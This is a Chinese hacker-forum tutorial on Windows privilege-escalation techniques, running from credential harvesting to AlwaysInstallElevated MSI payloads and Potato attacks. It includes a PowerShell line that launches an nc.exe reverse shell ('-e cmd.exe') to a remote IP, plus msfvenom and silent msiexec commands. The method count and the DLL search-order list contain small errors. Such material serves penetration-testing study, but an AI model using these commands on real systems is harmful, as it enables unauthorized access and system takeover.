跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

  • 0

网站入侵渗透测试之各种Windows提权思路讲解(八种最新方法)


HACK1949

问题

网站入侵渗透测试之各种Windows提权思路讲解(八种最新方法)

5fde07f6c0b0a.png

学习技术只为更好的保障自身 公司安全,切勿违规操作,有什么不懂的技术问题可以私聊~

方法一:winPEAS寻找可提权的地方

仓库地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

v2-922ea39a7674a8990368b6cdd6b78a81_720w

也可以用lazagne来收集密码,如果找到一个RDP可连接密码,可以用以下ps1来运行执行命令

$secpasswd = ConvertTo-SecureString "password321" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("john", $secpasswd)
$computer = "GHOST"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","192.168.0.114 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

方法二:本地存储的凭证是否有可利用的

cmdkey /list查询当前存储的凭证

v2-40e66c1c80452c152a7c0ebddce4cf39_720w

以存储凭证的用户执行command
runas /savecred /user:JIUSHI-PC\jiushi ““

v2-b156e9639cc0949d2122e7284409defe_720w

方法三:缺少的补丁提权

检查由于缺少补丁程序而造成的漏洞,使用exp提权
windows提权exp地址:https://github.com/SecWiki/windows-kernel-exploits

方法四:DLL劫持

windows程序在启动时查找dll。如果这些DLL不存在,则可能通过在应用程序寻找的位置放置恶意DLL来升级特权
通常,Windows应用程序将使用预定义的搜索路径来查找DLL,并将按特定的顺序检查这些路径:

  1. 当前程序目录
  2. C:\Windows\System
  3. C:\Windows\System32
  4. 当前程序目录
  5. PATH变量里的路径

自动搜索DLL劫持工具
仓库地址:https://github.com/itm4n/Ikeext-Privesc

v2-d67311ea3ad1deeb6a5ed04be92714f0_720w

方法五:服务问题

(1)服务路径没带引号
(2)服务路径所指向的可执行文件,可执行文件夹权限可被访问。用于替换exe
(3)服务注册表权限
(4)脆弱的服务权限,可被更改

之前说过,不在重复说明:windows配置错误导致的提权 | 九世的博客

方法六:始终安装提升

Windows可以通过AlwaysInstallElevated组策略允许低特权用户使用系统特权安装Microsoft Windows Installer软件包(MSI)

v2-8c6d96ef0d4bc6ee7393642cacdaf357_720w

msf create msi

msfvenom -p windows/x64/exec cmd=calc.exe -f msi -o test.msi

v2-65dd0014ad66e9108c1069105ade4341_720w

msiexec install

msiexec /quiet /qn /i <msi.path>

反之uninstall msi
msiexec /quiet /uninstall <msi.path>

v2-6d96b29cb15cbed75a2885ecb189616f_720w

Process观察进程可见到是SYSTEM权限运行的

v2-7dda9bfdfc13d50dc63b9683273186d5_720w

方法七:修改的自启运行

如果可以修改自动运行的路径,因此将文件替换为有效负载。 要以提升的特权执行它,我们需要等待Administrators组中的某人登录。

v2-f9f4fd082ee548eba6c0724e1883edea_720w

检查各个文件夹的权限

icacls "<dirpath>"

v2-d155ed8c2421ff9c855e220268d2a34c_720w

当其中一个文件夹有权限可以进行控制的话,生成exe替换掉原有的exe

v2-83307e1e4e719ef7879bdad75d4e9d69_720w

v2-a379e8a5eb0d1517843a4502edc34ef2_720w

方法八:烂土豆提权(Tater / Hot Potato)

条件限制:
1.需要支持SeImpersonate或者SeAssignPrimaryToken权限(通常情况下IIS、MSSQL具有这两个权限)
2.开启DCOM本地支持RPC或者远程服务器支持PRC并能成功登录
3.能够找到可用的COM对象

juicy-potato:https://zhuanlan.zhihu.com/p/113178989
改进版juicy-potato:https://www.t00ls.net/viewthread.php?tid=47362&highlight=potato
对应编号:MS16-075 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

方法九:第三方服务提权

通过枚举正在运行的服务,查其权限。看看有什么可以利用的,比如mysql的UDF

wmic service where started=true get name, startname
链接帖子
意见的链接
分享到其他网站

这个问题有0个答案

推荐的帖子

此问题没有答案

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...